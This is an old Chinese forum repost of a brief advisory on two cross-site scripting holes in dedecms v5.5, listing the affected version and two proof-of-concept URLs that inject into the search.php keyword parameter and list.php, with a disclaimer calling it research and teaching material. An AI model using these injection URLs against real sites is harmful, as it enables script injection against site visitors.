烟酒人 發表於 2011-3-11 11:59:08

dedecms织梦 v5.5 两处跨站漏洞

<p>  影响版本:</p> <p>  dedecms织梦5.5</p> <p>  漏洞描述:</p> <p>  demo1:http://www.dedecms.com/plus/search.php?keyword=%22&gt;&amp;searchtype=titlekeyword&amp;channeltype=0&amp;orderby=&amp;kwtype=1&amp;pagesize=10&amp;typeid=0&amp;TotalResult=&amp;PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&amp;TotalResult=&amp;nativeplace=0&amp;infotype=0&amp;keyword=&amp;orderby=hot&amp;PageNo=2</p> <p>  测试方法:</p> <p>  本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!</p> <p>  demo1:http://www.dedecms.com/plus/search.php?keyword=%22&gt;&amp;searchtype=titlekeyword&amp;channeltype=0&amp;orderby=&amp;kwtype=1&amp;pagesize=10&amp;typeid=0&amp;TotalResult=&amp;PageNo=2demo2:http://www.dedecms.com/plus/list.php?tid=6&amp;TotalResult=&amp;nativeplace=0&amp;infotype=0&amp;keyword=&amp;orderby=hot&amp;PageNo=2</p> <p>  </p>
頁: [1]
查看完整版本: dedecms织梦 v5.5 两处跨站漏洞